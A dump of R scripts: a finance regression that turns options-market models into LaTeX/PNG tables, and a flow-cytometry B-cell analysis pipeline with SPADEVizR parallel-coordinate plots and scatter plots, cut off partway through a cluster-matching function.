latexBaseModelIV = texreg(list(modelBaseIV, modelBaseIVLag, model30IV,model30IVLag,
                               model20IV,model20IVLag,model10IV,model10IVLag),
                          model.names=c("[-141,-41]","[-141,-41]", "[-30,-1]","[-30,-1]",
                                        "[-20,-1]","[-20,-1]", "[-10,-1]","[-10,-1]"),
                          digits = 5, table=FALSE, booktabs=FALSE, dcolumn=FALSE)
latexToPng(latexBaseModelIV, "baseModelIV")
| /FINA6206.R | no_license | qanwer/R | R | false | false | 4,125 | r |
# Load options-market regression data and build one-row-shifted "*Lag1"
# versions of each regressor via c(x[-1], NA): row i receives the value
# from row i+1, with NA padding the final row. Whether that shift is a lag
# or a lead depends on the CSV's row ordering — TODO confirm against the file.
require("texreg")
regData = read.csv("~/Downloads/regdata.csv")
# NOTE(review): unlike every other *Lag1 column below, NCallOILag1 is a
# plain copy of NCallOI (no "[-1], NA" shift) — confirm whether the lag
# was intended here.
regData = transform(regData, NCallOILag1 = c(NCallOI))
#regData = transform(regData, NCallOIChangedLag1 = c(NCallOIChanged[-1], NA))
regData = transform(regData, NPutOILag1 = c(NPutOI[-1], NA))
#regData = transform(regData, NPutOIChangeLag1 = c(NPutOIChange[-1], NA))
regData = transform(regData, NVolLag1 = c(NVol[-1], NA))
#regData = transform(regData, NVolChangeLag1 = c(NVolChange[-1], NA))
regData = transform(regData, PutCallOIRatioLag1 = c(PutCallOIRatio[-1], NA))
regData = transform(regData, NMeanIVLag1 = c(NMeanIV[-1], NA))
regData = transform(regData, MeanIVLag1 = c(MeanIV[-1], NA))
regData = transform(regData, CallIVLag1 = c(CallIV[-1], NA))
regData = transform(regData, PutIVLag1 = c(PutIV[-1], NA))
regData = transform(regData, Excess.ReturnLag1 = c(Excess.Return[-1], NA))
# Slice the event windows by DateDiff (days relative to the event date).
regDataBase = regData[regData$DateDiff >= -141 & regData$DateDiff <= -41 ,]
regData30 = regData[regData$DateDiff >= -30 & regData$DateDiff <= -1,]
regData20 = regData[regData$DateDiff >= -20 & regData$DateDiff <= -1,]
regData10 = regData[regData$DateDiff >= -10 & regData$DateDiff <= -1,]
# OLS regression of excess return on lagged AND contemporaneous options
# activity (normalized volume, put/call open-interest ratio, call/put OI).
# dataToUse: data frame containing the formula's columns (built by the
# transform() block above). Returns the fitted lm object.
baseModel <- function(dataToUse) {
  lm(Excess.Return ~
       NVolLag1 + PutCallOIRatioLag1 + NCallOILag1 + NPutOILag1
     + NVol + PutCallOIRatio + NCallOI + NPutOI
     , data=dataToUse)
}
# As baseModel(), but using only the lagged regressors (no contemporaneous
# terms). Returns the fitted lm object.
baseModelLagOnly <- function(dataToUse) {
  lm(Excess.Return ~
       NVolLag1 + PutCallOIRatioLag1 + NCallOILag1 + NPutOILag1
     , data=dataToUse)
}
# baseModel() extended with mean implied-volatility (NMeanIV) terms, both
# lagged and contemporaneous. Returns the fitted lm object.
baseModelIV <- function(dataToUse) {
  lm(Excess.Return ~
       NVolLag1 + PutCallOIRatioLag1 + NCallOILag1 + NPutOILag1 + NMeanIVLag1
     + NVol + PutCallOIRatio + NCallOI + NPutOI + NMeanIV
     , data=dataToUse)
}
# Lag-only variant of baseModelIV(): lagged activity plus lagged mean IV.
# Returns the fitted lm object.
baseModelIVLagOnly <- function(dataToUse) {
  lm(Excess.Return ~
       NVolLag1 + PutCallOIRatioLag1 + NCallOILag1 + NPutOILag1 + NMeanIVLag1
     , data=dataToUse)
}
# Render a LaTeX table fragment (e.g. texreg output) to a PNG image:
# wrap it in a minimal standalone document, compile with `latex`, then
# convert the resulting DVI with `dvipng`. Both executables must be on
# the system PATH.
#
# Args:
#   latexS:   character vector holding the LaTeX table body.
#   fileName: base name (without extension) for the generated files.
#
# Returns nothing; called for its side effects (<fileName>.tex/.dvi and
# the PNG that dvipng emits in the working directory).
latexToPng <- function(latexS, fileName) {
  latexFileName <- paste0(fileName, ".tex")
  dviFileName <- paste0(fileName, ".dvi")
  fileConn <- file(latexFileName)
  # Release the connection even if writeLines() fails; the original code
  # only closed it on the success path, leaking the connection on error.
  on.exit(close(fileConn), add = TRUE)
  #\\usepackage[paperwidth=5.5in,paperheight=7in,noheadfoot,margin=0in]{geometry}
  beginLines <- '\\documentclass{report}
\\usepackage{booktabs}
\\usepackage{dcolumn}
\\begin{document}\\pagestyle{empty}
\\begin{table}
\\begin{center}
'
  endLines <- '
\\end{center}
\\label{table:coefficients}
\\end{table}
\\end{document}
'
  writeLines(c(beginLines, latexS, endLines), fileConn)
  # Exit statuses of the external tools are intentionally discarded.
  invisible(system(paste("latex ", latexFileName)))
  invisible(system(paste("dvipng -T tight", "-D", 600, dviFileName)))
}
# Fit all window/model combinations (see the window slicing above), then
# render each set as a LaTeX table via texreg and convert it to a PNG.
modelBase = baseModel(regDataBase)
modelBaseLag = baseModelLagOnly(regDataBase)
model30 = baseModel(regData30)
model30Lag = baseModelLagOnly(regData30)
model20 = baseModel(regData20)
model20Lag = baseModelLagOnly(regData20)
model10 = baseModel(regData10)
model10Lag = baseModelLagOnly(regData10)
# IV-augmented versions of the same fits.
modelBaseIV = baseModelIV(regDataBase)
modelBaseIVLag = baseModelIVLagOnly(regDataBase)
model30IV = baseModelIV(regData30)
model30IVLag = baseModelIVLagOnly(regData30)
model20IV = baseModelIV(regData20)
model20IVLag = baseModelIVLagOnly(regData20)
model10IV = baseModelIV(regData10)
model10IVLag = baseModelIVLagOnly(regData10)
# Column headers label the event window each model was fit on.
latexBaseModel = texreg(list(modelBase, modelBaseLag, model30,model30Lag,
                             model20,model20Lag,model10,model10Lag),
                        model.names=c("[-141,-41]","[-141,-41]", "[-30,-1]","[-30,-1]",
                                      "[-20,-1]","[-20,-1]","[-10,-1]","[-10,-1]"),
                        digits = 5, table=FALSE, booktabs=FALSE, dcolumn=FALSE)
latexToPng(latexBaseModel, "baseModel")
latexBaseModelIV = texreg(list(modelBaseIV, modelBaseIVLag, model30IV,model30IVLag,
                               model20IV,model20IVLag,model10IV,model10IVLag),
                          model.names=c("[-141,-41]","[-141,-41]", "[-30,-1]","[-30,-1]",
                                        "[-20,-1]","[-20,-1]", "[-10,-1]","[-10,-1]"),
                          digits = 5, table=FALSE, booktabs=FALSE, dcolumn=FALSE)
latexToPng(latexBaseModelIV, "baseModelIV")
|
####################################################
#### INSTALLATION OF ALL PACKAGES Below - do not need to repeat if already in library (Try running lines 16-19 first, if some packages missing revert to line 4-11):
####################################################
# NOTE(review): the biocLite() workflow was retired with Bioconductor 3.8;
# on current R use BiocManager::install() instead.
source("https://bioconductor.org/biocLite.R")
biocLite()
biocLite("FlowSOM")
# NOTE(review): "biocLite" is not a CRAN package — this call will fail.
# It was presumably meant to be the source() line above.
install.packages("biocLite")
biocLite(suppressUpdates = TRUE)
biocLite("flowCore", suppressUpdates = TRUE)
install.packages('devtools')
install.packages('Rcpp')
install.packages('biclust')
install.packages('data.table')
install.packages('diptest')
install.packages('evtree')
install.packages('ggdendro')
install.packages("ggfortify")
install.packages('ggplot2')
install.packages('gplots')
install.packages('gdata')
install.packages('ggrepel')
install.packages('ggRandomForests')
install.packages('gridExtra')
install.packages('gtable')
install.packages('gtools')
install.packages('igraph')
install.packages('MASS')
install.packages('packcircles')
install.packages('plyr')
install.packages("randomForestSRC")
install.packages('reshape2')
install.packages('pheatmap')
install.packages('readxl')
install.packages("raster")
install.packages('openxlsx')
# NOTE(review): devtools is installed twice (also above).
install.packages('devtools')
library("devtools")
# SPADEVizR is GitHub-only, hence install_github rather than install.packages.
install_github('tchitchek-lab/SPADEVizR')
source("http://bioconductor.org/biocLite.R")
biocLite(suppressUpdates = TRUE)
biocLite("flowCore", suppressUpdates = TRUE)
# NOTE(review): edgeR is a Bioconductor package; the install.packages()
# call will fail and the biocLite() call below is the one that works.
install.packages('edgeR')
biocLite("edgeR")
install.packages("bindrcpp")
install.packages("stringi")
install.packages("statmod")
###################################################
# Library the packages
###################################################
library("devtools")
library("FlowSOM")
library('Rcpp')
library("SPADEVizR")
library(statmod)
library("edgeR")
library(gplots)
library(RColorBrewer)
library(pheatmap)
library(readxl)
library(openxlsx)
library(data.table)
library(ggplot2)
library(raster)
####################################################
####################################################
source("utils.R") #Sources utils function for phenoviewer_modified
##################################################
# Parallel coordinate plots generated using SPADEvizR - FOR GROUP 1 DATA:
##################################################
### Imports Sheet 4 and Sheet 2 and renames "Abundance" and "Phenotype" respectively, from desired excel file - must change path and excel file name for particular function
# Remember the starting directory so later sections can setwd() back to it.
PrimaryDirectory <- getwd()
Abundance <- read_excel("./Grp 1 DR3 D51 B Cells 20181205 K=35.xlsx", sheet = "Sheet4")
View(Abundance)
Phenotype <- read_excel("./Grp 1 DR3 D51 B Cells 20181205 K=35.xlsx", sheet = "Sheet2")
View(Phenotype)
### Reformats data for R to run SpadeVizR Script - must change lines 43 and 47 to match size of Abundance and Phenotype Sheets (rows, columns)
# Hard-coded dimensions: 185 clusters x (1 name col + 16 samples).
cluster.abundances <- as.data.frame(Abundance[1:185,1:17])
# First column holds the cluster names; promote it to rownames.
rownames(cluster.abundances) <- cluster.abundances[,1]
cluster.abundances <- cluster.abundances[,-1]
# Phenotype sheet: 2960 rows x 37 cols; column 3 is dropped below.
cluster.phenotypes <- as.data.frame(Phenotype[1:2960,1:37])
cluster.phenotypes <- cluster.phenotypes[,-3]
# Build the SPADEVizR 'Results' S4 object consumed by phenoViewer_modified().
results <- importResultsFromTables(cluster.abundances = cluster.abundances, cluster.phenotypes = cluster.phenotypes)
### MODIFIED PHENOVIEWER SCRIPT FOR MORE ACCURATE PARALLEL PLOTS ###
# phenoViewer_modified: customised version of SPADEVizR's phenoViewer().
# Draws a parallel-coordinates plot of mean marker expression: one grey
# line per cluster in the whole dataset as background context, plus a red
# line for the mean of the requested cluster(s).
#
# Args:
#   Results        - SPADEVizR 'Results' S4 object (slots accessed via @).
#   samples        - sample names to include; NULL = all samples.
#   clusters       - cluster name(s) to highlight (required, character).
#   markers        - marker names to plot; NULL = all markers.
#   show.mean      - must be "none"/"both"/"only"; validated below but not
#                    otherwise used in this modified version.
#   show.on_device - logical; validated below but not otherwise used.
#   sort.markers   - TRUE: clustering markers first, each group mixedsort-ed;
#                    FALSE: keep the order of `markers`.
# Returns the ggplot object invisibly after drawing it on the device.
phenoViewer_modified <- function(Results,
                                 samples = NULL,
                                 clusters = NULL,
                                 markers = NULL,
                                 show.mean = "both",
                                 show.on_device = TRUE,
                                 sort.markers = TRUE) {
  ### when testing the function, use the parameters inside the function and test line by line of code. Use statement below to test the function above
  # Results=results
  # samples = NULL
  # clusters = "Cluster 10"
  # markers = NULL
  # show.mean = "only"
  # show.on_device = TRUE
  # sort.markers = TRUE
  # --- Argument validation -------------------------------------------------
  if (is.null(Results)) {
    stop("Error in phenoViewer: 'Results' parameter can not be NULL")
  } else if (class(Results)[1] != "Results") {
    stop("Error in phenoViewer: 'Results' parameter must be a 'Results' object")
  }
  if(length(Results@marker.names) == 0){
    stop("Error in phenoViewer: 'Results' object must contain phenotypes")
  }
  # --- Sample selection (NULL = every sample in the Results object) --------
  if (is.null(samples)) {
    samples <- Results@sample.names
    data <- Results@cluster.phenotypes
    cluster.abundances <- Results@cluster.abundances
  } else if (!all(samples %in% Results@sample.names)) {
    stop("Error in phenoViewer: 'samples' parameter must contains only samples names\n Unknown sample names: ",
         paste(setdiff(unique(samples), Results@sample.names), collapse = " "))
  } else {
    data <- subset(Results@cluster.phenotypes, sample %in% samples, drop = FALSE)
    cluster.abundances <- Results@cluster.abundances[, samples, drop = FALSE]
  }
  data <- stats::na.omit(data)
  # --- Cluster selection (required) ----------------------------------------
  if (is.null(clusters)) {
    stop("Error in phenoViewer: 'clusters' parameter is required")
  } else if (all(clusters %in% Results@cluster.names)) {
    if (typeof(clusters) != "character") {
      stop("Error in phenoViewer: 'clusters' parameter must be a character vector")
    }
    clusters <- unique(clusters)
    clusters.select <- data[, "cluster"] %in% clusters
    data <- data[clusters.select,]
    cluster.abundances <- cluster.abundances[clusters,]
  } else {
    stop("Error in phenoViewer:\nUnknown clusters : ", paste(setdiff(unique(clusters), Results@cluster.names), collapse = " "))
  }
  # Mean marker expression per sample for the selected cluster(s);
  # columns 1-2 are sample/cluster identifiers, markers start at column 3.
  data <- plyr::ddply(data, c("sample"), function(df) {
    apply(df[, 3:ncol(df)], 2, mean, na.rm = TRUE)
  })
  # --- Marker selection (NULL = all markers) -------------------------------
  if (is.null(markers)) {
    markers <- Results@marker.names
  } else if (all(markers %in% Results@marker.names)) {
    markers <- unique(markers)
    data <- data[, c("sample", markers)]
  } else {
    stop("Error in phenoViewer: Unknown markers :", paste(setdiff(unique(markers), Results@marker.names), collapse = " "))
  }
  if (show.mean != "none" && show.mean != "both" && show.mean != "only") {
    stop("Error in phenoViewer: 'show.mean' parameter must contain only one of these : 'none', 'both' or 'only'")
  }
  if (!is.logical(show.on_device)) { stop("Error in phenoViewer: 'show.on_device' parameter must be a logical") }
  # Reshape to long format: one row per (sample, marker).
  data <- reshape2::melt(data, id = c("sample"), stringsAsFactors = FALSE)
  colnames(data) <- c("samples", "marker", "value")
  names.palette <- unique(Results@cluster.phenotypes$sample)
  palette <- ggcolors(length(names.palette))
  names(palette) <- names.palette
  # --- Optional biological-condition (bc) assignments ----------------------
  # When present, samples are grouped/coloured by their assigned condition.
  assignments <- Results@assignments
  if (!is.null(assignments)) {
    order <- unique(assignments$bc)
    assignments <- assignments[samples, , drop = FALSE]
    data$bc <- assignments[data$samples, "bc"]
    order <- intersect(order, unique(assignments$bc))
    data$bc <- factor(data$bc, levels = order)
    names.palette <- unique(assignments$bc)
    palette <- ggcolors(length(names.palette))
    names(palette) <- names.palette
  } else if (is.element("bc", colnames(assignments))) {
    # NOTE(review): this branch can only run when assignments is NULL, so
    # the is.element() test is always FALSE here — dead code inherited from
    # the original phenoViewer.
    warning("Warning in phenoViewer: 'assignments' slot do not contain the column 'bc' in the provided 'Results' object. Consequently, the samples names will be used in remplacement")
  } else {
    warning("Warning in phenoViewer: 'assignments' slot in the provided 'Results' object is absent. Consequently, the samples names will be used in remplacement")
  }
  # --- Marker ordering on the x axis ---------------------------------------
  # Clustering markers are drawn bold/blue; others plain/black.
  if(sort.markers==TRUE){
    clustering.markers <- Results@clustering.markers
    ordered.markers <- c(gtools::mixedsort(clustering.markers),gtools::mixedsort(setdiff(Results@marker.names, clustering.markers)))
    bold.markers <- ifelse(is.element(ordered.markers, clustering.markers), "bold", "plain")
    colored.markers <- ifelse(is.element(ordered.markers, clustering.markers), "blue", "black")
    data$marker <- factor(data$marker, levels = ordered.markers, ordered = TRUE)
  }else{
    clustering.markers <- Results@clustering.markers
    ordered.markers <- markers
    bold.markers <- ifelse(is.element(ordered.markers, clustering.markers), "bold", "plain")
    colored.markers <- ifelse(is.element(ordered.markers, clustering.markers), "blue", "black")
    data$marker <- factor(data$marker, levels = ordered.markers, ordered = TRUE)
  }
  # Attach the per-marker expression bounds (used for the y-axis range).
  for (i in seq_len(nrow(data))) {
    data[i, "lower.bound"] <- Results@bounds[1, as.character(data[i, "marker"])]
    data[i, "upper.bound"] <- Results@bounds[2, as.character(data[i, "marker"])]
  }
  cells.number <- sum(colSums(cluster.abundances))
  title <- paste("Pheno Viewer - cluster: ", paste0(clusters, collapse = ", "), " (", format(cells.number, big.mark = " "), " cells)", sep = "")
  bounds <- as.numeric(row.names(Results@bounds))
  subtitle <- paste0("Grey ribbon displays from ", (bounds[1] * 100), "% to ", (bounds[2] * 100), "% percentiles of the range expression")
  # y-axis limits: data range padded by 10% on each side.
  max.value <- -1
  min.value <- -1
  max.value <- max(c(data$value, data$upper.bound), na.rm = TRUE)
  min.value <- min(c(data$value, data$lower.bound), na.rm = TRUE)
  max.value <- max.value * (1 + sign(max.value) * 0.1)
  min.value <- min.value * (1 - sign(min.value) * 0.1)
  # Overall mean per marker for the highlighted cluster(s) (red line).
  means <- plyr::ddply(data,
                       c("marker"),
                       function(df){mean(df$value, na.rm = TRUE)})
  colnames(means) <- c("marker", "means")
  # --- Background lines: per-cluster mean expression across ALL clusters ---
  # Seed row of zeros is dropped after the loop (data_means[-1, ]).
  data_means = data.frame(marker = 0, means= 0, clusters = 0)
  # NOTE(review): this reads the GLOBAL cluster.phenotypes (note the capital-C
  # "Cluster" column), not the Results object — the function depends on that
  # global being in scope. Confirm this coupling is intended.
  tmp_clusters<- unique(cluster.phenotypes$Cluster) ###### make sure the cluster.phenotypes file column name is "Cluster" and not "cluster"
  for(i in tmp_clusters){
    tmp_data<- Results@cluster.phenotypes
    tmp_clusters.select <- tmp_data[, "cluster"] %in% i
    tmp_data <- tmp_data[tmp_clusters.select,]
    tmp_data <- plyr::ddply(tmp_data, c("sample"), function(df) {
      apply(df[, 3:ncol(df)], 2, mean, na.rm = TRUE)
    })
    tmp_data <- reshape2::melt(tmp_data, id = c("sample"), stringsAsFactors = FALSE)
    colnames(tmp_data) <- c("samples", "marker", "value")
    tmp_means <- plyr::ddply(tmp_data,
                             c("marker"),
                             function(df){mean(df$value, na.rm = TRUE)})
    colnames(tmp_means) <- c("marker", "means")
    tmp_means$clusters = i
    data_means = rbind(data_means, tmp_means)
  }
  data_means = data_means[-1, ]
  # data_means$marker = substr(data_means$marker, 2, 100000)
  #data_means = data_means[order(data_means$marker, decreasing = TRUE), ]
  # --- Assemble the plot ----------------------------------------------------
  plot <- ggplot2::ggplot(data = data_means) +
    ggplot2::ggtitle(bquote(atop(.(title), atop(italic(.(subtitle)), ""))))
  # Grey background line per cluster.
  plot <- plot + ggplot2::geom_line(ggplot2::aes_string(x = "marker", y = "means", group = "clusters"),
                                    size = 0.5, #changes size of background lines
                                    alpha = 1,
                                    color = "#CCCCCC")+
    ggplot2::scale_y_continuous(limits = c(min.value, max.value), breaks = round(seq(0, max.value, by = 1), 0)) +
    ggplot2::theme_bw()
  # Red line: mean expression of the highlighted cluster(s).
  plot <- plot + ggplot2::geom_line(data = means,
                                    ggplot2::aes_string(x = "marker", y = "means", group = 1),
                                    #group = 1,
                                    linetype = "solid",
                                    size = 1,
                                    color = "#FF6666")
  plot <- plot + ggplot2::theme(axis.text.x = ggplot2::element_text(angle = 90, hjust = 1, vjust = 0.5, face = bold.markers, color = colored.markers)) +
    ggplot2::theme(legend.text = ggplot2::element_text(size = 6),
                   legend.key = ggplot2::element_blank(),
                   plot.title = ggplot2::element_text(hjust=0.5)) +
    ggplot2::xlab("markers") +
    ggplot2::ylab("marker expressions") +
    ggplot2::guides(col = ggplot2::guide_legend(ncol = 1))
  # Draw on the current device and return the plot invisibly for reuse.
  grid::grid.draw(plot)
  invisible(plot)
}
# Save one parallel-coordinates JPEG per Group-1 cluster into its own folder.
dir.create("Group1_ClusterImages", showWarnings = FALSE)
setwd("Group1_ClusterImages")
for(i in 1:nrow(cluster.abundances)){
  #i=1
  # 2000x1500 px at 300 dpi; file is named after the cluster.
  jpeg(paste(rownames(cluster.abundances)[i], ".jpeg", sep = ""),
       width=2000,
       height=1500,
       res = 300)
  phenoViewer_modified(results, clusters = rownames(cluster.abundances)[i])
  # NOTE(review): if phenoViewer_modified() errors, the jpeg device is left
  # open — consider on.exit/tryCatch if that becomes a problem.
  dev.off()
}
setwd(PrimaryDirectory)
####################################
#SCATTER PLOT GENERATOR
###################################
# Export Group-1 abundance counts to TSV, normalise each sample's counts to
# per-sample percentages, then draw one dot plot per cluster across groups.
GroupOne_SheetFour <- read_excel("./Grp 1 DR3 D51 B Cells 20181205 K=35.xlsx", sheet = "Sheet4")
write.table(GroupOne_SheetFour, file = "Data for Scatter Plot Group 1.txt", sep = "\t",row.names = FALSE, col.names = TRUE)
#load data
data <- read.table("Data for Scatter Plot Group 1.txt", header = TRUE, sep = "\t", stringsAsFactors = FALSE)
data <- as.data.frame(data[1:185,1:17])
data$Cluster <- gsub(" ", "_", data$Cluster, fixed = TRUE)
rownames(data) <- data$Cluster
data <- data[,-1]
# Convert raw counts to percentage of each sample's (column's) total.
sum_counts_sample <- colSums(data)
for (i in 1:nrow(data)) {
  for (j in 1:ncol(data)) {
    data[i,j] = data[i,j]/sum_counts_sample[j]*100
  }
}
#transpose the data for ploting
data <- t(data)
data <- as.data.frame(data)
#group assignment
group_data <- read.table("group assignment for group 1.txt", header = TRUE, sep = "\t", stringsAsFactors = FALSE)
group_data$sample <- trim(group_data$sample)
group_data$sample = gsub(" ", ".", group_data$sample, fixed = TRUE)
# NOTE(review): the match() lookup is commented out, so group labels are
# assigned purely by ROW ORDER — the assignment file must list samples in
# exactly the same order as the data columns. Confirm this is intended.
data$group <- group_data$group#[match(rownames(data), group_data$sample)]
data <- data[, c(ncol(data), 1:(ncol(data)-1))]
dir.create("Group1_Scatterplots", showWarnings = FALSE)
setwd("Group1_Scatterplots")
# Fixed display order of the experimental groups on the x axis.
x_order = factor(data$group, levels=c("Naive Unchallenged", "Naive Challenged", "Vax Unchallenged","Vax Challenged"), ordered=TRUE)
# One dot plot per cluster column, with median line and IQR error bars.
# NOTE(review): fun.y/fun.ymin/fun.ymax were renamed fun/fun.min/fun.max in
# ggplot2 >= 3.3 — these spellings warn or fail on newer versions.
for(i in 2:ncol(data)){
  scatter_plot <-
    ggplot(data, aes_string(x = x_order, fill = "group", y = colnames(data)[i]))+
    geom_dotplot(binaxis = "y", stackdir = "centerwhole") +
    stat_summary(fun.y = "median", size=0.5, geom = 'line', aes(group=1))+
    stat_summary(
      fun.ymin = function(z) { quantile(z,0.25) },
      fun.ymax = function(z) { quantile(z,0.75) },
      fun.y = median,
      width = 0.2,
      geom = "errorbar") +
    theme(axis.text.x = element_text(size = 25, face = "bold", vjust = 1.0, hjust = 1.0, angle = 45)) +
    theme(axis.text.y = element_text(size = 20, face = "bold", vjust = 0.5, hjust = 0.5, angle = 0)) +
    theme(legend.position = "none")
  ggsave(scatter_plot,
         width = 20,
         height = 15,
         dpi = 300,
         filename = paste(colnames(data)[i], ".jpeg", sep = ""))
}
setwd(PrimaryDirectory)
##################################################
# Parallel co-ordinate plots generated using SPADEvizR - FOR GROUP 2 DATA:
##################################################
### Imports Sheet 4 and Sheet 2 and renames "Abundance" and "Phenotype" respectively, from desired excel file - must change path and excel file name for particular function
# Same pipeline as the Group-1 section above, with Group-2 dimensions
# (151 clusters x 15 samples; 2265 phenotype rows).
Abundance <- read_excel("./Grp 2 DR3 D51 B Cells 20181205 K=26.xlsx", sheet = "Sheet4")
View(Abundance)
Phenotype <- read_excel("./Grp 2 DR3 D51 B Cells 20181205 K=26.xlsx", sheet = "Sheet2")
View(Phenotype)
### Reformats data for R to run SpadeVizR Script - must change lines 85 and 89 to match size of Abundance and Phenotype Sheets (rows, columns)
cluster.abundances <- as.data.frame(Abundance[1:151,1:16])
rownames(cluster.abundances) <- cluster.abundances[,1]
cluster.abundances <- cluster.abundances[,-1]
cluster.phenotypes <- as.data.frame(Phenotype[1:2265,1:37])
cluster.phenotypes <- cluster.phenotypes[,-3]
results <- importResultsFromTables(cluster.abundances = cluster.abundances, cluster.phenotypes = cluster.phenotypes)
# Save one parallel-coordinates JPEG per Group-2 cluster.
dir.create("Group2_ClusterImages", showWarnings = FALSE)
setwd("Group2_ClusterImages")
for(i in 1:nrow(cluster.abundances)){
  jpeg(paste(rownames(cluster.abundances)[i], ".jpeg", sep = ""),
       width=2000,
       height=1500,
       res = 300)
  phenoViewer_modified(results, clusters = rownames(cluster.abundances)[i])
  dev.off()
}
setwd(PrimaryDirectory)
####################################
#SCATTER PLOT GENERATOR
###################################
# Group-2 version of the scatter-plot section above (151 clusters, 15 samples).
GroupTwo_SheetFour <- read_excel("./Grp 2 DR3 D51 B Cells 20181205 K=26.xlsx", sheet = "Sheet4")
write.table(GroupTwo_SheetFour, file = "Data for Scatter Plot Group 2.txt", sep = "\t",row.names = FALSE, col.names = TRUE)
#load data
data <- read.table("Data for Scatter Plot Group 2.txt", header = TRUE, sep = "\t", stringsAsFactors = FALSE)
data <- as.data.frame(data[1:151,1:16])
data$Cluster <- gsub(" ", "_", data$Cluster, fixed = TRUE)
rownames(data) <- data$Cluster
data <- data[,-1]
# Convert raw counts to percentage of each sample's (column's) total.
sum_counts_sample <- colSums(data)
for (i in 1:nrow(data)) {
  for (j in 1:ncol(data)) {
    data[i,j] = data[i,j]/sum_counts_sample[j]*100
  }
}
#transpose the data for ploting
data <- t(data)
data <- as.data.frame(data)
#group assignment
group_data <- read.table("group assignment for group 2.txt", header = TRUE, sep = "\t", stringsAsFactors = FALSE)
group_data$sample <- trim(group_data$sample)
group_data$sample = gsub(" ", ".", group_data$sample, fixed = TRUE)
# NOTE(review): match() is commented out — group labels rely on row order
# matching the data columns (same caveat as the Group-1 section).
data$group <- group_data$group#[match(rownames(data), group_data$sample)]
data <- data[, c(ncol(data), 1:(ncol(data)-1))]
dir.create("Group2_Scatterplots", showWarnings = FALSE)
setwd("Group2_Scatterplots")
x_order = factor(data$group, levels=c("Naive Unchallenged", "Naive Challenged", "Vax Unchallenged","Vax Challenged"), ordered=TRUE)
for(i in 2:ncol(data)){
  scatter_plot <-
    ggplot(data, aes_string(x = x_order, fill = "group", y = colnames(data)[i]))+
    geom_dotplot(binaxis = "y", stackdir = "centerwhole") +
    stat_summary(fun.y = "median", size=0.5, geom = 'line', aes(group=1))+
    stat_summary(
      fun.ymin = function(z) { quantile(z,0.25) },
      fun.ymax = function(z) { quantile(z,0.75) },
      fun.y = median,
      width = 0.2,
      geom = "errorbar") +
    theme(axis.text.x = element_text(size = 25, face = "bold", vjust = 1.0, hjust = 1.0, angle = 45)) +
    theme(axis.text.y = element_text(size = 20, face = "bold", vjust = 0.5, hjust = 0.5, angle = 0)) +
    theme(legend.position = "none")
  ggsave(scatter_plot,
         width = 20,
         height = 15,
         dpi = 300,
         filename = paste(colnames(data)[i], ".jpeg", sep = ""))
}
setwd(PrimaryDirectory)
#########################################################################################################################################################
#########################################################################################################################################################
#### Next four lines of code generate .txt files from sheet one of group 1 and 2 excel sheets to be used for pearson's correlation
# These TSVs are consumed by rescale_to_0_1() below.
### Creates a .txt file of sheet one from Group 1 excel file containing all vortex data
GroupOne_SheetOne <- read_excel("./Grp 1 DR3 D51 B Cells 20181205 K=35.xlsx", sheet = "Sheet1")
write.table(GroupOne_SheetOne, file = "Grp 1 DR3 D51 B Cells 20181205 K=35.txt", sep = "\t",row.names = FALSE, col.names = TRUE)
### Creates a .txt file of sheet one from Group 2 excel file containing all vortex data
GroupTwo_SheetOne <- read_excel("./Grp 2 DR3 D51 B Cells 20181205 K=26.xlsx", sheet = "Sheet1")
write.table(GroupTwo_SheetOne, file = "Grp 2 DR3 D51 B Cells 20181205 K=26.txt", sep = "\t",row.names = FALSE, col.names = TRUE)
###################################################
# Generates a list of matching clusters from group 1 and 2 based on pearson's correlation and count
###################################################
# rescale_to_0_1: collapse a per-event TSV ("Sheet1" export) into one row
# per cluster, then (optionally) min-max rescale each column to [0, 1]
# across clusters so two experiments can be compared by Pearson correlation.
#
# Args:
#   experiment_name - prefix prepended to each cluster's rowname (e.g. "Grp1").
#   experiment_file - tab-separated file with a "Cluster" column, a "Term"
#                     (sample) column, a "Count" column and marker columns.
#   rescale         - if TRUE, min-max rescale every column except the last.
#
# Returns a data frame: one row per cluster, rownames "<name>_Cluster_<id>",
# with summed Count, per-cluster mean marker values, and an extra "Count1"
# column holding the ORIGINAL (unrescaled) count.
rescale_to_0_1 <- function(experiment_name, experiment_file, rescale = TRUE){
  #read the file
  raw_table = read.delim(experiment_file, sep = "\t", stringsAsFactors = FALSE)
  #modify the column name
  # Strip the "X."/"X" prefixes read.delim adds to non-syntactic names.
  colnames(raw_table) = gsub("X.", "", colnames(raw_table), fixed = TRUE)
  colnames(raw_table) = gsub("X", "", colnames(raw_table), fixed = TRUE)
  #modify the cluster name
  # Normalise "Cluster 12" / "Cluster12" to "Cluster_12".
  raw_table$Cluster = gsub("Cluster", "", raw_table$Cluster, fixed = TRUE)
  raw_table$Cluster = gsub(" ", "", raw_table$Cluster, fixed = TRUE)
  raw_table$Cluster = paste("Cluster_", raw_table$Cluster, sep = "")
  #sorting the dataset for better view
  # IMPORTANT: the aggregation loop below assumes rows of the same cluster
  # are contiguous, which this sort guarantees.
  raw_table = raw_table[order(raw_table$Cluster, raw_table$Term, decreasing = FALSE),]
  #obtain the samples name
  samples = unique(raw_table$Term)
  #obtain the amount of samples
  nSample= length(samples)
  #obtain the cluster name
  clusters = unique(raw_table$Cluster)
  #obtain the amount of clusters
  nCluster = length(clusters)
  #create a blank table with labels
  # Seed a 1-row frame with the same columns as raw_table minus "Term".
  mean_marker_total_cells = data.frame(tmp_name = 0)
  for(i in 1:(ncol(raw_table)-1)){
    mean_marker_total_cells = cbind(mean_marker_total_cells, 0)
  }
  colnames(mean_marker_total_cells) = colnames(raw_table)
  mean_marker_total_cells = mean_marker_total_cells[, colnames(mean_marker_total_cells)!= "Term"]
  # creat a array for storing the number of total numbers of cluster for samples
  cluster_count = rep(0,nCluster)
  #calculate and store the total numbers of cluster for samples
  # Walk the sorted rows; each time the cluster id changes (or at the last
  # row), write one aggregated row k: column 1 = cluster name, column 2 =
  # summed Count, remaining columns = per-cluster marker means.
  j = 1
  k = 1
  for(i in 1:nrow(raw_table)){
    if(i == nrow(raw_table)){
      # Final row: flush the last cluster's aggregate and exit.
      cluster_count[j] = cluster_count[j] + 1
      for(n in 1:ncol(mean_marker_total_cells)){
        if(n == 1){
          mean_marker_total_cells[k,n] = raw_table$Cluster[i]
        }
        if(n == 2){
          mean_marker_total_cells[k,n] = sum(raw_table[(i-cluster_count[j]+1):i,n+1])
        }
        if(n > 2){
          mean_marker_total_cells[k,n] = mean(raw_table[(i-cluster_count[j]+1):i,n+1])
        }
      }
      break()
    }
    if(raw_table$Cluster[i] == raw_table$Cluster[i+1]){
